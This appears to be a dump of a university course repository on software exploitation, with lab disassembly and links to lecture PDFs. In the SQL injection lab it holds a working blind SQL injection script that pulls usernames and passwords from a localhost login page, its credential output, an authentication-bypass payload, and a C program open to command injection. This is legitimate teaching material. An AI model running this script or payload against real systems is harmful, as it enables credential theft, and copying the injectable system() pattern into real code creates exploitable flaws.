4004ef: 8b 34 88 mov (%rax,%rcx,4),%esi 145 | 4004f2: ff d2 callq *%rdx 146 | 4004f4: 31 f6 xor %esi,%esi 147 | 4004f6: 89 45 e4 mov %eax,-0x1c(%rbp) 148 | 4004f9: 89 f0 mov %esi,%eax 149 | 4004fb: 48 83 c4 20 add $0x20,%rsp 150 | 4004ff: 5d pop %rbp 151 | 400500: c3 retq 152 | 400501: 66 66 66 66 66 66 2e data16 data16 data16 data16 data16 nopw %cs:0x0(%rax,%rax,1) 153 | 400508: 0f 1f 84 00 00 00 00 154 | 40050f: 00 155 | 156 | 0000000000400510 : 157 | 400510: 55 push %rbp 158 | 400511: 48 89 e5 mov %rsp,%rbp 159 | 400514: 48 83 ec 20 sub $0x20,%rsp 160 | 400518: 48 b8 80 04 40 00 00 movabs $0x400480,%rax 161 | 40051f: 00 00 00 162 | 400522: 48 89 7d f8 mov %rdi,-0x8(%rbp) 163 | 400526: 48 89 75 f0 mov %rsi,-0x10(%rbp) 164 | 40052a: 89 55 ec mov %edx,-0x14(%rbp) 165 | 40052d: 48 8b 7d f8 mov -0x8(%rbp),%rdi 166 | 400531: 8b 75 ec mov -0x14(%rbp),%esi 167 | 400534: 48 89 c2 mov %rax,%rdx 168 | 400537: e8 84 ff ff ff callq 4004c0 169 | 40053c: 48 ba a0 04 40 00 00 movabs $0x4004a0,%rdx 170 | 400543: 00 00 00 171 | 400546: 48 8b 7d f0 mov -0x10(%rbp),%rdi 172 | 40054a: 8b 75 ec mov -0x14(%rbp),%esi 173 | 40054d: 89 45 e8 mov %eax,-0x18(%rbp) 174 | 400550: e8 6b ff ff ff callq 4004c0 175 | 400555: 31 f6 xor %esi,%esi 176 | 400557: 89 45 e4 mov %eax,-0x1c(%rbp) 177 | 40055a: 89 f0 mov %esi,%eax 178 | 40055c: 48 83 c4 20 add $0x20,%rsp 179 | 400560: 5d pop %rbp 180 | 400561: c3 retq 181 | 400562: 66 66 66 66 66 2e 0f data16 data16 data16 data16 nopw %cs:0x0(%rax,%rax,1) 182 | 400569: 1f 84 00 00 00 00 00 183 | 184 | 0000000000400570
: 185 | 400570: 55 push %rbp 186 | 400571: 48 89 e5 mov %rsp,%rbp 187 | 400574: 48 81 ec 80 00 00 00 sub $0x80,%rsp 188 | 40057b: 48 8d 45 90 lea -0x70(%rbp),%rax 189 | 40057f: 48 8d 4d c0 lea -0x40(%rbp),%rcx 190 | 400583: c7 45 fc 00 00 00 00 movl $0x0,-0x4(%rbp) 191 | 40058a: 89 7d f8 mov %edi,-0x8(%rbp) 192 | 40058d: 48 89 75 f0 mov %rsi,-0x10(%rbp) 193 | 400591: 8b 55 f8 mov -0x8(%rbp),%edx 194 | 400594: 48 89 cf mov %rcx,%rdi 195 | 400597: 48 89 c6 mov %rax,%rsi 196 | 40059a: e8 71 ff ff ff callq 400510 197 | 40059f: 31 d2 xor %edx,%edx 198 | 4005a1: 89 45 8c mov %eax,-0x74(%rbp) 199 | 4005a4: 89 d0 mov %edx,%eax 200 | 4005a6: 48 81 c4 80 00 00 00 add $0x80,%rsp 201 | 4005ad: 5d pop %rbp 202 | 4005ae: c3 retq 203 | 4005af: 90 nop 204 | 205 | 00000000004005b0 <__libc_csu_init>: 206 | 4005b0: 41 57 push %r15 207 | 4005b2: 41 56 push %r14 208 | 4005b4: 49 89 d7 mov %rdx,%r15 209 | 4005b7: 41 55 push %r13 210 | 4005b9: 41 54 push %r12 211 | 4005bb: 4c 8d 25 8e 08 20 00 lea 0x20088e(%rip),%r12 # 600e50 <__frame_dummy_init_array_entry> 212 | 4005c2: 55 push %rbp 213 | 4005c3: 48 8d 2d 8e 08 20 00 lea 0x20088e(%rip),%rbp # 600e58 <__init_array_end> 214 | 4005ca: 53 push %rbx 215 | 4005cb: 41 89 fd mov %edi,%r13d 216 | 4005ce: 49 89 f6 mov %rsi,%r14 217 | 4005d1: 4c 29 e5 sub %r12,%rbp 218 | 4005d4: 48 83 ec 08 sub $0x8,%rsp 219 | 4005d8: 48 c1 fd 03 sar $0x3,%rbp 220 | 4005dc: e8 8f fd ff ff callq 400370 <_init> 221 | 4005e1: 48 85 ed test %rbp,%rbp 222 | 4005e4: 74 20 je 400606 <__libc_csu_init+0x56> 223 | 4005e6: 31 db xor %ebx,%ebx 224 | 4005e8: 0f 1f 84 00 00 00 00 nopl 0x0(%rax,%rax,1) 225 | 4005ef: 00 226 | 4005f0: 4c 89 fa mov %r15,%rdx 227 | 4005f3: 4c 89 f6 mov %r14,%rsi 228 | 4005f6: 44 89 ef mov %r13d,%edi 229 | 4005f9: 41 ff 14 dc callq *(%r12,%rbx,8) 230 | 4005fd: 48 83 c3 01 add $0x1,%rbx 231 | 400601: 48 39 dd cmp %rbx,%rbp 232 | 400604: 75 ea jne 4005f0 <__libc_csu_init+0x40> 233 | 400606: 48 83 c4 08 add $0x8,%rsp 234 | 40060a: 5b pop %rbx 235 | 40060b: 5d pop %rbp 236 | 40060c: 41 5c pop %r12 237 | 40060e: 41 5d pop %r13 238 | 400610: 41 5e pop %r14 239 | 400612: 41 5f pop %r15 240 | 400614: c3 retq 241 | 400615: 90 nop 242 | 400616: 66 2e 0f 1f 84 00 00 nopw %cs:0x0(%rax,%rax,1) 243 | 40061d: 00 00 00 244 | 245 | 0000000000400620 <__libc_csu_fini>: 246 | 400620: f3 c3 repz retq 247 | 248 | Disassembly of section .fini: 249 | 250 | 0000000000400624 <_fini>: 251 | 400624: 48 83 ec 08 sub $0x8,%rsp 252 | 400628: 48 83 c4 08 add $0x8,%rsp 253 | 40062c: c3 retq 254 | -------------------------------------------------------------------------------- /[6]control_flow_integrity/lab6.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/artbom/software-vulnerabilities-exploitation-and-mitigation/8efe40a12f2e19fa8a6a895bef98c982ab89e46e/[6]control_flow_integrity/lab6.pdf -------------------------------------------------------------------------------- /[6]control_flow_integrity/lab6_ARTEM_KALIAHIN.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/artbom/software-vulnerabilities-exploitation-and-mitigation/8efe40a12f2e19fa8a6a895bef98c982ab89e46e/[6]control_flow_integrity/lab6_ARTEM_KALIAHIN.pdf -------------------------------------------------------------------------------- /[7]heap_overflow/lab7.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/artbom/software-vulnerabilities-exploitation-and-mitigation/8efe40a12f2e19fa8a6a895bef98c982ab89e46e/[7]heap_overflow/lab7.pdf -------------------------------------------------------------------------------- /[7]heap_overflow/lab7_ARTEM_KALIAHIN.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/artbom/software-vulnerabilities-exploitation-and-mitigation/8efe40a12f2e19fa8a6a895bef98c982ab89e46e/[7]heap_overflow/lab7_ARTEM_KALIAHIN.pdf -------------------------------------------------------------------------------- /[8]type_confusion_java/lab8.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/artbom/software-vulnerabilities-exploitation-and-mitigation/8efe40a12f2e19fa8a6a895bef98c982ab89e46e/[8]type_confusion_java/lab8.pdf -------------------------------------------------------------------------------- /[9]sql_injection/a.out: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/artbom/software-vulnerabilities-exploitation-and-mitigation/8efe40a12f2e19fa8a6a895bef98c982ab89e46e/[9]sql_injection/a.out -------------------------------------------------------------------------------- /[9]sql_injection/dump.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | import requests 3 | 4 | url = 'http://localhost/lab09/login.php' 5 | chars = 'abcdefghijklmnopqrstuvwxyz0123456789\'\"!@#$%^&*()_-=;:~`ABCDEFGHIJKLMNOPQRSTUWXYZ' 6 | keyword = 'cat.JPG' 7 | usernames, passwords = [] 8 | 9 | #check first 100 rows of usernames 10 | for i in range (1, 101): 11 | #offset 12 | j = 1 13 | is_successful = True 14 | success_query = '' 15 | while is_successful: 16 | is_successful = False 17 | #loop through ascii characters 18 | for letter in chars: 19 | #changing ID, offset and letter 20 | injection = "?u=\" OR id = " + str(i) + " and SUBSTRING(username, " + str(j) + ", 1) = \'" + letter + "\' -- " 21 | #get request to the localhost 22 | req_content = requests.get(url+injection).text 23 | #looking for keyword cat.JPG in response from server 24 | if req_content.find(keyword) != -1: 25 | success_query += letter 26 | is_successful = True 27 | #incrementing offset 28 | j += 1 29 | break 30 | #appending username to the usernames array after exiting the loop 31 | usernames.append(success_query) 32 | 33 | 34 | for i in range (1, 101): 35 | j = 1 36 | is_successful = True 37 | success_query = '' 38 | while is_successful: 39 | is_successful = False 40 | for letter in chars: 41 | injection = "?u=\" OR id = " + str(i) + " and SUBSTRING(password, " + str(j) + ", 1) = \'" + letter + "\' -- " 42 | req_content = requests.get(url+injection).text 43 | if req_content.find(keyword) != -1: 44 | success_query += letter 45 | is_successful = True 46 | j += 1 47 | break 48 | passwords.append(success_query) 49 | 50 | 51 | #printing 52 | for i in range (0, 100): 53 | print('id:', i+1, 'username:', usernames[i], 'password:', passwords[i]) 54 | -------------------------------------------------------------------------------- /[9]sql_injection/dump.txt: -------------------------------------------------------------------------------- 1 | id: 1 username: milobuttery password: vagcidjaisrokbeyhujetuj 2 | id: 2 username: fightselfie password: iackmomjargepnamjic_ 3 | id: 3 username: seducingmille password: inwejhofercetkatsyuvjadyeuz= 4 | id: 4 username: alaskadispersal password: bydmughanatanyokzycheukvig 5 | id: 5 username: moussierchunch password: recbarnagnudnejkodyiac 6 | id: 6 username: wheelchairpotty password: udbiecnanfaj9obvub5 7 | id: 7 username: monthdundee password: topvienmiesbeighajkekodyik6 8 | id: 8 username: bulwarkflammable password: yiasedceuwohomyoweafki 9 | id: 9 username: captaintanana password: ler 10 | id: 10 username: robandcone password: traxcisi 11 | id: 11 username: juvenileattack password: nibvejeroandojcek 12 | id: 12 username: syrupoutward password: homductiroxwa 13 | id: 13 username: jurymastcypriot password: tincejrustyamt0 14 | id: 14 username: speltbearing password: speteekuxbabdoijvod3 15 | id: 15 username: commonengross password: moxotghom 16 | id: 16 username: wanderergoose password: ricdyfsooricketlok 17 | id: 17 username: swadgeetive password: rhiesyimheerosjecetogg 18 | id: 18 username: infectedeuhedral password: obgerpyeshleomjavdymewbaz` 19 | id: 19 username: undustedoversized password: eerremoa 20 | id: 20 username: mongoosecommand password: wydeepnikdejlehikojso 21 | id: 21 username: fiftyfence password: jicmehibmupopeef8irim) 22 | id: 22 username: oddballsloping password: prawyeawcy 23 | id: 23 username: selectionkite password: odvanyinamkipcevrisencyir 24 | id: 24 username: ladidabenefit password: knetbefjoot0 25 | id: 25 username: rascalcomments password: owghetopyewb1slothea 26 | id: 26 username: oatpishy password: sadomungidud3 27 | id: 27 username: blackwellwhispered password: valipafedhec7 28 | id: 28 username: plusgymnast password: anluefchojbanucbymto 29 | id: 29 username: scunkentime password: godbyaktapsyuolen 30 | id: 30 username: forecabinpushy password: doag;bopoofvacgau 31 | id: 31 username: heinzsediment password: jivtashefjealcobheipnotkez 32 | id: 32 username: pendantconfess password: duercyidtavhenidsodzylseewod1 33 | id: 33 username: freehandnoddle password: yucunliavidbyttuvgahu 34 | id: 34 username: multiplychubby password: desuchontyotyupawec 35 | id: 35 username: woodchatzigzagged password: deewcashdyukneftucedgothtilj4 36 | id: 36 username: boarddrug password: shoadpheft0 37 | id: 37 username: bustwalk password: cacmefeutecpidberluc2quojhic) 38 | id: 38 username: luciditymoustache password: takkorcidoixgiewsyisdothvelye 39 | id: 39 username: patternsboyfriend password: edvuvkaletweit 40 | id: 40 username: slookcloud password: wakjagsoxcivjiatagtatmu 41 | id: 41 username: unwittingcarlisle password: _boolnegyik6ochel 42 | id: 42 username: snuffhockey password: yoghowyogikcilsorhasubwuegvir 43 | id: 43 username: shiningfermium password: hyuksisenignecwironquonhyovma 44 | id: 44 username: lampvisitors password: lejquebbusyubonwiwefithtimt 45 | id: 45 username: profuselydeceased password: dedsanhagoonsav 46 | id: 46 username: wickedfreezing password: shucajwautlyhynoam 47 | id: 47 username: draughtremnant password: criveucitucotlavthuashev` 48 | id: 48 username: friednative password: enlirevdiguvu 49 | id: 49 username: blessten password: jufipgaryaynivfockadcoc9 50 | id: 50 username: dodgytidbit password: vevjeephadvev: 51 | id: 51 username: horologiumcovet password: yahipotawkont 52 | id: 52 username: talldiet password: kecpyahikbadorporcyegya 53 | id: 53 username: resamplespiky password: virkyiryotudembohy 54 | id: 54 username: wagconfusion password: 55 | id: 55 username: spitefulmuted password: cruobokanjimhorrowg 56 | id: 56 username: visitorpotato password: eltomjawgondeep 57 | id: 57 username: stubbedchug password: frichereeghoicbedoadmy 58 | id: 58 username: mapsumardale password: sodyoveywuaft 59 | id: 59 username: jarringgiza password: odbamanwacabtetdehicij 60 | id: 60 username: seniormethodical password: vesbuecphofevjahinrivegdab1 61 | id: 61 username: dittyposes password: muilefyicmuig 62 | id: 62 username: widthtraligill password: yeetfrymorfufteniradd 63 | id: 63 username: backlitsugar password: lihyfod 64 | id: 64 username: gristlydraught password: juniarkezmahyodidepfeud 65 | id: 65 username: aloofrespect password: fartongadevodbacnudnu 66 | id: 66 username: yellowstonehatching password: hofolmoydlecs5qui 67 | id: 67 username: monitorscedric password: neddagtyonfibquahas 68 | id: 68 username: bikesmacked password: haubawtovlahoroakkeorg1 69 | id: 69 username: pointsbarcode password: twixgenhikhahoshsicibokaleys 70 | id: 70 username: scopegibbon password: wedoogmudadveglegsids 71 | id: 71 username: splotchygizzard password: nofwevoddiadyahymejbikmyak 72 | id: 72 username: failingacceptor password: rybpyherseilciwi 73 | id: 73 username: webchoopy password: gricijof 74 | id: 74 username: hairunvaried password: yeephorduj 75 | id: 75 username: amospumlumon password: yojkat8fif 76 | id: 76 username: steeringsiren password: sajipbakignoktaicemaiffer2 77 | id: 77 username: degreesix password: jeccurm7 78 | id: 78 username: selectiondrone password: moicigdosawhibfaqueyturk2 79 | id: 79 username: nemosterilize password: dibyidmov 80 | id: 80 username: organicvarnish password: yoylkyemsajaickoiwubugtitor 81 | id: 81 username: shiningdrastic password: untuvausfadhoulkia 82 | id: 82 username: lugrants password: ugdejvetvubcowcochiruj 83 | id: 83 username: worshipmouthed password: acojvohufitur 84 | id: 84 username: bullprobing password: badjiujurdeubjegvoi 85 | id: 85 username: unveiledoversweet password: dythowtexigugnathoaf 86 | id: 86 username: yearmugshot password: buedyemghefmedreftyoceukvunaf 87 | id: 87 username: doubleeardrum password: tepsifyidjuep 88 | id: 88 username: anthonyopposed password: dretnerrotvub 89 | id: 89 username: refinishsilver password: jotacheupifduajeftarsh 90 | id: 90 username: exclaimcartel password: ifhivwobeng4 91 | id: 91 username: podsoldier password: reanlibcithkainbokee 92 | id: 92 username: preyscrabble password: juvhotadcarbanou 93 | id: 93 username: glazedgarment password: huryekusjoftyaicaphachevon5 94 | id: 94 username: gogglesroasting password: volaf 95 | id: 95 username: stoppedtransportation password: dawkoitjodtothingyonkyednodcov 96 | id: 96 username: policieswittering password: redcirhagudquevhahestirajooc 97 | id: 97 username: babiessingular password: pevpheundyonhyrewitij0 98 | id: 98 username: admin password: 12356789 99 | id: 99 username: toto password: safyacfoticewquikwavhegednugen 100 | id: 100 username: titi password: noddaim1 101 | -------------------------------------------------------------------------------- /[9]sql_injection/first.txt: -------------------------------------------------------------------------------- 1 | First file! 2 | -------------------------------------------------------------------------------- /[9]sql_injection/lab9.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/artbom/software-vulnerabilities-exploitation-and-mitigation/8efe40a12f2e19fa8a6a895bef98c982ab89e46e/[9]sql_injection/lab9.pdf -------------------------------------------------------------------------------- /[9]sql_injection/lab9_ARTEM_KALIAHIN.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/artbom/software-vulnerabilities-exploitation-and-mitigation/8efe40a12f2e19fa8a6a895bef98c982ab89e46e/[9]sql_injection/lab9_ARTEM_KALIAHIN.pdf -------------------------------------------------------------------------------- /[9]sql_injection/second.txt: -------------------------------------------------------------------------------- 1 | The attacker should give the username query such as we finish username string with parentheses " and then we give any true statement for SQL to return $result, where number of rows is more than 0, and we comment everything else with double hyphen to skip password check. In fact, this type of query should return the whole table. 2 | Eventually, query will look like this: 3 | 4 | $conn->query("SELECT * from users where username == \"" OR 0 = 0--\" and password == 􏰀→ \"$password\""); -------------------------------------------------------------------------------- /[9]sql_injection/test.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | int main(int argc, char **argv) { 7 | char cat[] = "cat "; 8 | char *command; 9 | size_t commandLength; 10 | commandLength = strlen(cat) + strlen(argv[1]) + 1; 11 | command = (char *) malloc(commandLength); 12 | strncpy(command, cat, commandLength); 13 | strncat(command, argv[1], (commandLength - strlen(cat)) ); 14 | 15 | int len = strlen(command); 16 | int i = 0; 17 | 18 | while (i < len) { 19 | if (command[i] == ';' || command[i] == '&' || command[i] == '|') { 20 | command[i] = '\0'; 21 | break; 22 | } 23 | i++; 24 | } 25 | system(command); 26 | return (0); 27 | } -------------------------------------------------------------------------------- /lecture00/lecture00.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/artbom/software-vulnerabilities-exploitation-and-mitigation/8efe40a12f2e19fa8a6a895bef98c982ab89e46e/lecture00/lecture00.pdf -------------------------------------------------------------------------------- /lecture01/introduction.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/artbom/software-vulnerabilities-exploitation-and-mitigation/8efe40a12f2e19fa8a6a895bef98c982ab89e46e/lecture01/introduction.pdf -------------------------------------------------------------------------------- /lecture01/lecture 01 - software vulnerabilities.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/artbom/software-vulnerabilities-exploitation-and-mitigation/8efe40a12f2e19fa8a6a895bef98c982ab89e46e/lecture01/lecture 01 - software vulnerabilities.pdf -------------------------------------------------------------------------------- /lecture02/stack-overflow.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/artbom/software-vulnerabilities-exploitation-and-mitigation/8efe40a12f2e19fa8a6a895bef98c982ab89e46e/lecture02/stack-overflow.pdf -------------------------------------------------------------------------------- /lecture03/DEP-expanded.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/artbom/software-vulnerabilities-exploitation-and-mitigation/8efe40a12f2e19fa8a6a895bef98c982ab89e46e/lecture03/DEP-expanded.pdf -------------------------------------------------------------------------------- /lecture03/DEP.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/artbom/software-vulnerabilities-exploitation-and-mitigation/8efe40a12f2e19fa8a6a895bef98c982ab89e46e/lecture03/DEP.pdf -------------------------------------------------------------------------------- /lecture04/aslr.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/artbom/software-vulnerabilities-exploitation-and-mitigation/8efe40a12f2e19fa8a6a895bef98c982ab89e46e/lecture04/aslr.pdf -------------------------------------------------------------------------------- /lecture06/cfi.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/artbom/software-vulnerabilities-exploitation-and-mitigation/8efe40a12f2e19fa8a6a895bef98c982ab89e46e/lecture06/cfi.pdf -------------------------------------------------------------------------------- /lecture07/heap-overflow.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/artbom/software-vulnerabilities-exploitation-and-mitigation/8efe40a12f2e19fa8a6a895bef98c982ab89e46e/lecture07/heap-overflow.pdf -------------------------------------------------------------------------------- /lecture08/type-confusion.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/artbom/software-vulnerabilities-exploitation-and-mitigation/8efe40a12f2e19fa8a6a895bef98c982ab89e46e/lecture08/type-confusion.pdf -------------------------------------------------------------------------------- /lecture09/sql-injection.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/artbom/software-vulnerabilities-exploitation-and-mitigation/8efe40a12f2e19fa8a6a895bef98c982ab89e46e/lecture09/sql-injection.pdf -------------------------------------------------------------------------------- /lecture10/confused-deputy.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/artbom/software-vulnerabilities-exploitation-and-mitigation/8efe40a12f2e19fa8a6a895bef98c982ab89e46e/lecture10/confused-deputy.pdf -------------------------------------------------------------------------------- /lecture11/fuzzing.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/artbom/software-vulnerabilities-exploitation-and-mitigation/8efe40a12f2e19fa8a6a895bef98c982ab89e46e/lecture11/fuzzing.pdf -------------------------------------------------------------------------------- /project/Exploitation of a PoC type confusion in C++.pptx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/artbom/software-vulnerabilities-exploitation-and-mitigation/8efe40a12f2e19fa8a6a895bef98c982ab89e46e/project/Exploitation of a PoC type confusion in C++.pptx --------------------------------------------------------------------------------